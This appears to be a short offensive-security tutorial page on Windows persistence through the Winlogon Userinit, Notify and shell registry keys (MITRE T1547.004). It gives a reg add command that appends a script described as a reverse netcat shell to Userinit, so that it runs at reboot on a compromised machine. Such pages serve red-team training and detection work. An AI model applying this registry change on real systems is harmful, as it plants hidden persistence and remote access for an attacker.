Windows Logon Helper
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Commonly abused Winlogon registry keys and value for persistence are:
1
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
2
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
3
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell
Copied!
HKCU can also be replaced with HKLM for a system wide persistence, if you have admin privileges.

Execution

Let's run through the techqnique abusing the userinit subkey.
Let's see what's currently held at the userinit:
1
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit
Copied!
Let's now add an additional item shell.cmd (a simple reverse netcat shell) to the list that we want to be launched when the compromised machine reboots:
1
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit /d C:\Windows\system32\userinit.exe,C:\tools\shell.cmd /t reg_sz /f
Copied!
Rebooting the compromised system executes the c:\tools\shell.cmd, which in turn establishes a reverse shell to the attacking system:

References

Boot or Logon Autostart Execution: Winlogon Helper DLL, Sub-technique T1547.004 - Enterprise | MITRE ATT&CK®
Last modified 1yr ago
Copy link